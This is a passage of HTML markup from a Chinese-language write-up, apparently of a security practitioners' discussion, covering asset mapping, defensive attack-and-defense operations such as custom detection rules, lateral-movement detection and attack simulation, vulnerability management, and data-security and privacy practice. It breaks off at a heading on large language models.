微软雅黑;font-size: 12pt;color: black;"><span leaf="">覆盖互联网系统、开放端口、web站点、域名、api接口、公共号、小程序、saas、IP资产。</span></p></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;margin-bottom: 0px;"><span style="color:
red;"><span leaf="">全打通</span></span><span style="color:black;"><span leaf="">：</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">应用系统的基础资源，列出图，关注</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span leaf="">IP</span></span><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">、策略</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span leaf="">API</span></span><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">资产，和全流量溯源、平台应用登记等去重分析汇总</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">自动化测绘，发现新暴露端口、管理页面，可以自动化处置</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">多种扫描器打通，所有日志打通</span></span></li></ul><h1 style="margin:0in;font-size:16.0pt;color:#1E4E79;"><span style="font-family:
微软雅黑;"><span leaf=""><br/></span></span></h1><h1 style="margin:0in;font-size:16.0pt;color:#1E4E79;"><span style="font-family:
微软雅黑;"><span leaf="">主题</span></span><span style="font-family:Calibri;"><span leaf="">2</span></span><span style="font-family:微软雅黑;"><span leaf="">：</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;"><span leaf="">安全攻防</span></span></h1><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;color: black;"><span style="font-family:
&#34;微软雅黑 Light&#34;;"><span leaf="">感受</span></span><span style="font-family:Calibri;"><span leaf="">1</span></span><span style="font-family:微软雅黑;"><span leaf="">： 精细化运营可以提升对复杂攻击的应对能力，确保‘有备无患’。</span></span></p><p style="margin-right: 0in;margin-left: 0in;font-size: 11pt;color: black;"><span style="font-family:
&#34;微软雅黑 Light&#34;;"><span leaf="">感受</span></span><span style="font-family:Calibri;"><span leaf="">2</span></span><span style="font-family:微软雅黑;"><span leaf="">：自研能力的提升为应对未来威胁提供了更强的适应力，也是用户体验的关键。</span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;color: black;"><span leaf="">感受3：积累了丰富的“临床试验 + 治疗能力”。</span></p><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
&#34;微软雅黑 Light&#34;;"><span leaf="">优先事项：精细化运营</span></span><span style="font-family:Calibri;"><span leaf=""> + </span></span><span style="font-family:&#34;微软雅黑 Light&#34;;"><span leaf="">自研能力提升</span></span></h2><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 11pt;color: black;"><span leaf="">核心策略是通过自定义规则和深度学习内网活动，来精细化运营、减少误报并提升整体检测能力。更重视对日志源的控制与利用、内网横向渗透测试以及安全防御策略的持续验证。这些措施有助于提升对高级持续性威胁（APT）等复杂攻击的防御能力。</span></p><table style="direction:ltr;border-collapse:collapse;border-style:solid;border-color:#A3A3A3;border-width:
 1pt;"><tbody><tr><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.3694in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-weight:bold;"><span leaf="">优先事项</span></span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:4.7145in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-weight:bold;"><span leaf="">对应内容</span></span></p></td></tr><tr><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.3881in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-weight:bold;"><span leaf="">1. 提升告警准确性，降低误报率</span></span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:4.6951in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;"><span leaf="">规则由团队自行编写，减少误报，提升检测准确性。误报永远无法消除，</span></span><span style="color:#FA0000;"><span leaf="">“度”是日常能够处理得过来</span></span><span style="color:black;"><span leaf="">。</span></span></p></td></tr><tr><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.3881in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;"><span style="font-weight:bold;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">2. 提升应用系统日志接入覆盖面</span></span><span style="font-family:
  &#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span leaf="">        </span></span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:4.7618in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span style="color:black;"><span leaf="">从http数据、源头（如 Sysmon）获取日志，而非仅仅依赖  EDR，EDR日志在应对真实攻击事件时还不够，有缺失。重点推sysmon等新工具的原因是为了</span></span><span style="color:#FA0000;"><span leaf="">日志数据的原始性和完整性</span></span><span style="color:black;"><span leaf="">。</span></span></p></td></tr><tr><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.3881in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-weight:bold;"><span leaf="">3. 内网横向攻击检测与响应能力</span></span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:4.6951in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-size:12.0pt;color:black;"><span style="font-family:
  &#34;微软雅黑 Light&#34;;"><span leaf="">通过模拟攻击（内网横向渗透测试）来学习日志数据，配置新的检测规则，产生告警。之前</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;"><span leaf="">侧重边界防御，挡住攻击；真实演练和事件响应之后，做了内网攻击检测。已经收集了100+款工具。</span></span></p></td></tr><tr><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.3819in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-weight:bold;"><span leaf="">4. 防御验证能力建设BAS（攻击模拟）</span></span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:4.7118in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span leaf="">使用  BAS 工具模拟攻击，发现和修正现有防御中的漏洞。例如NTA某个探针失效，不会产生告警了，BAS可以发现。</span></p></td></tr><tr><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:1.3694in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;color:black;"><span style="font-weight:bold;"><span leaf="">5. 提升终端安全检测能力</span></span></p></td><td valign="top" style="border-style:solid;border-color:#A3A3A3;border-width:1pt;vertical-align:top;width:4.7145in;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="margin:0in;font-size:12.0pt;color:black;"><span style="font-family:
  &#34;微软雅黑 Light&#34;;"><span leaf="">EDR主要用于办公环境中的终端安全，作为其他安全措施的补充。UEBA做数据安全。</span></span></p></td></tr></tbody></table><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;"><span leaf=""><br/></span></h2><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;"><span leaf="">数据计算：探针数据化，能力规则化</span></h2><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="margin-right: 0in;margin-left: 0in;font-size: 12pt;color: black;"><span style="font-family:
微软雅黑;"><span leaf="">采集</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;"><span leaf="">80+</span></span><span style="font-family:微软雅黑;"><span leaf="">种日志，采集器、检测系统非常多元，每日新增</span></span><span style="font-family:
&#34;微软雅黑 Light&#34;;"><span leaf="">10</span></span><span style="font-family:微软雅黑;"><span leaf="">T级数据</span></span></p></li><li><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;"><span leaf="">以数据为中心，自己写规则检测威胁，作为大量的探索实验和能力积累的沉淀</span></p></li><li><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;"><span leaf="">资产信息维度多，且实现了关联</span></p></li><li><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;"><span leaf="">探索性攻击系统，看有什么日志，没有日志要采集新日志，有日志没告警就要配置规则</span></p></li></ul><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;"><span leaf=""><br/></span></h2><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;"><span leaf="">厂商可辅助，但不能依赖</span></h2><p style="margin-right: 0in;margin-left: 0in;margin-bottom: 0px;"><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">随着数据积累和技术平台的完善，如何与厂商的合作也成为了一个关键议题。有了技术、数据、平台，怎么看厂商：</span></span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span leaf="">    </span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">越来越希望</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:red;"><span leaf="">有全量数据，有更底层的数据</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">，而不是依赖厂商产品加工后的数据</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">不满足于厂商简单策略的自动化，基于数据的更多字段，实现更灵活的控制、压制能力</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">厂商可以帮助发现问题，指出你的某项检测能力和业界相比较差，但是调研、研究、检查，还需要一个个场景自己去做，实际也是</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:red;"><span leaf="">自己一个个做出来的</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">团队必须掌握完整技能栈，</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:red;"><span leaf="">厂商可辅助，但不能依赖</span></span></li></ul><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;"><span leaf=""><br/></span></h2><h2 style="margin:0in;font-family:微软雅黑;font-size:14.0pt;color:#276296;"><span leaf="">守住关键：朴素的防护原则</span></h2><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">防护原则：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">暴露面最小化，服务器访问纵深化，特权账户最小化，检测能力定制化，补丁最新化。</span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">零日漏洞：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">回归到内网渗透，因为要假定防御设备扛不住，打进来之后要能捕捉到关键攻击信号，把入侵踢掉，让入侵者不能横向移动，成功止血。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">防御时单点的误报率比较高，但是要把多种信号串起来</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">自定义规则，才可能有高置信度的告警</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span leaf="">RASP</span></span><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">防零日漏洞确实有用，能多抗一段时间，让黑客放弃转而去追逐其他目标</span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;margin-bottom: 0px;"><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf=""><br/></span></span></p><p style="margin-right: 0in;margin-left: 0in;margin-bottom: 0px;"><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">国产组件：</span></span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:
11.0pt;"><span leaf="">     </span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">国产组件或开源组件，需要自己去搜集漏洞，扫描器很多不支持国产组件，或者历史漏洞扫描不出来，但是攻防时这类就类似</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span leaf="">0 </span></span><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">day，就有人打进来</span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">漏洞运营：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;color:red;"><span leaf="">停止在不会带来风险的漏洞上浪费时间</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">自动化，修补确实有风险的3-5%的漏洞</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">漏洞直接发单到责任人，修复自动关闭</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">需要异构扫描器、多种扫描方式、覆盖不同服务类型；还需要收集常用</span></span><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span leaf="">POC</span></span><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">，自己去扫，并脚本化</span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">SOAR形成协同作战平台：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">用API集成、打通分散的安全能力，形成协同作战平台</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:&#34;微软雅黑 Light&#34;;font-size:12.0pt;"><span leaf="">SOAR</span></span><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">作为安全自动化的中枢，按照剧本，打通、触发组织动作</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">邮件安全、社工攻击剧本实践：技术繁杂、沙箱类别多，联动环节多，暴露面收缩、限制使用行为也很关键。</span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">攻防演练：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">演练需要设计能达到的目标，确保有效果，能找到问题，事先合同约定未达到预设目标要扣款。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">预设目标：外部要突破互联网边界，内部要获取应用权限或堡垒机权限等</span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;margin-bottom: 0px;"><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf=""><br/></span></span></p><p style="margin-right: 0in;margin-left: 0in;margin-bottom: 0px;"><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">攻击面收缩的老难题：</span></span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span leaf="">    </span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">攻击面收缩面临的主要问题包括重视不足（同行出丑闻后才下决心）、安全团队话语权低（提了但未得到认可，或者就没往上提准备自己抗锅）、安全与用户体验冲突。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">主要表现为系统过度暴露、不当配置管理和安全措施被忽视。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">要有效收缩攻击面，需各方认可的安全意识，风险评估上报机制。</span></span><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf=""><br/></span></span></li></ul><h1 style="margin:0in;font-size:16.0pt;color:#1E4E79;"><span style="font-family:
微软雅黑;"><span leaf=""><br/></span></span></h1><h1 style="margin:0in;font-size:16.0pt;color:#1E4E79;"><span style="font-family:
微软雅黑;"><span leaf="">主题</span></span><span style="font-family:Calibri;"><span leaf="">3</span></span><span style="font-family:微软雅黑;"><span leaf="">：数据安全</span></span></h1><p style="margin-right: 0in;margin-left: 0in;"><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">感受：错综复杂的数据安全，让人感觉无从下手。</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:red;"><span leaf="">庖丁解牛</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">，大体就是这样吧。</span></span><span style="font-family:&#34;Microsoft YaHei&#34;;font-size:11.0pt;"><span leaf="">    </span></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">要点：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">数据安全能力建设，应是更新的领域，场景差异明显。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">数据安全成本高、影响大、监管多变。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">处罚力度相对人性化，一般当事人的上级会先说“这类数据不重要”、“业务需要”。</span></span></li></ul><h2 style="margin: 0in 0in 0px;font-family: 微软雅黑;font-size: 14pt;color: rgb(39, 98, 150);"><span leaf=""><br/></span></h2><h2 style="margin: 0in 0in 0px;font-family: 微软雅黑;font-size: 14pt;color: rgb(39, 98, 150);"><span leaf="">数据安全实践的核心逻辑</span></h2><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;margin-bottom: 0px;"><span style="color:
black;"><span leaf="">“</span></span><span style="color:red;"><span leaf="">PbD（隐私设计理念）+SDLC（软件开发生命周期）</span></span><span style="color:black;"><span leaf="">”、“</span></span><span style="color:red;"><span leaf="">数据全生命周期</span></span><span style="color:black;"><span leaf="">”、“</span></span><span style="color:red;"><span leaf="">数据安全运营</span></span><span style="color:black;"><span leaf="">”、“</span></span><span style="color:red;"><span leaf="">重点能力建设</span></span><span style="color:black;"><span leaf="">”相结合：</span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">横向上，软件生命周期中的每个阶段都涉及数据安全需求，和开发安全实践深度绑定，隐私设计嵌入软件生命周期。即通过各个工序阶段、持续的风险评估，确保数据在生命周期内符合合规要求。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">纵向上，以外防内控的场景为抓手，做资产探测、流转检测、防泄漏、UEBA重点基础能力；也能从数据全生命周期构建更精细的场景化技术能力。即构建以技术为支撑的场景化能力，确保各环节数据安全。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">闭环角度，运营能力的核心在于将静态设计（软件生命周期）和技术能力（数据生命周期）动态化、闭环化，实现全局化、实时化的数字安全管理。</span></span></li></ul><h2 style="margin: 0in 0in 0px;font-family: 微软雅黑;font-size: 14pt;color: rgb(39, 98, 150);"><span leaf=""><br/></span></h2><h2 style="margin: 0in 0in 0px;font-family: 微软雅黑;font-size: 14pt;color: rgb(39, 98, 150);"><span leaf="">具体数据安全能力建设</span></h2><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">数据安全评估能力建设：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">基线化：制定清晰的评估基准，</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:red;"><span leaf="">翻译“法律语言”为“业务语言”</span></span><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">，便于业务与技术人员理解与实施。</span></span><span style="font-family:宋体;font-size:12.0pt;color:black;"><span leaf="">    </span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">工程化：将数据安全与个人信息保护措施融入业务流程的全生命周期（SDLC）。包括合规性评审、需求分析与设计、编码、测试、发布上线、持续运行监控等阶段。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">技术化：研发自动化数据安全与隐私保护检测工具，（逆向多），提高检测效率并生成分析报告。</span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">APP 安全隐私管控：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">定期评估：识别隐私风险并设计改进方案，确保新旧版本的App均符合法律与监管要求。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">制度规范：建立内部隐私管理制度，明确责任分工与技术管理措施。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">完整保护体系：将隐私保护要求嵌入开发全流程，建立隐私政策更新与技术测试机制。</span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">重要数据梳理与处理：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">识别重要数据范围：明确数据的种类、应用场景、存储位置及访问权限。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">清单化管理：形成重要数据清单，指定针对数据的保护措施，确保及时发现和应对异常操作。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">全流程监管：从数据的收集、处理到存储，实现全面分析和风险预警。</span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">数据安全溯源来源：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;color:black;"><span leaf="">外部监测：实时监测外部社交平台、交易活动等信息泄露情况。</span></span><span style="font-family:宋体;font-size:12.0pt;color:black;"><span leaf="">    </span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">客户投诉受理：处理涉及数据泄露的客户投诉，定位数据安全事件根源。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">内部事件分析：通过行为分析和日志记录发现潜在数据风险。</span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">人员管理与安全：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">外包管控：基于API和数据监测能力识别外包操作的异常行为。</span></span></li><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">离职审计：分析员工离职后的潜在数据风险，防止数据泄露。</span></span></li></ul><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf=""><br/></span></p><p style="margin-right: 0in;margin-left: 0in;font-family: 微软雅黑;font-size: 12pt;color: black;margin-bottom: 0px;"><span leaf="">数据分类与保护技术手段：</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li style="margin-top:0;margin-bottom:0;vertical-align:middle;color:black;"><span style="font-family:微软雅黑;font-size:12.0pt;"><span leaf="">使用技术手段（如Hook系统、日志数据分析、隐私检测技术）对网络数据、日志数据及个人隐私数据进行深度分析和实时保护。</span></span></li></ul><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
Calibri;"><span leaf=""><br/></span></span></h2><h2 style="margin:0in;font-size:14.0pt;color:#2E75B5;"><span style="font-family:
Calibri;"><span leaf="">LLM: </span></span><span style="font-family:&#34;微软雅黑 Light&#34;;"><span leaf="">从攻防、应用安全看数据安全</span></span></h2><table style="direction:ltr;border-collapse:collapse;border-style:solid;border-color:#A3A3A3;border-width:
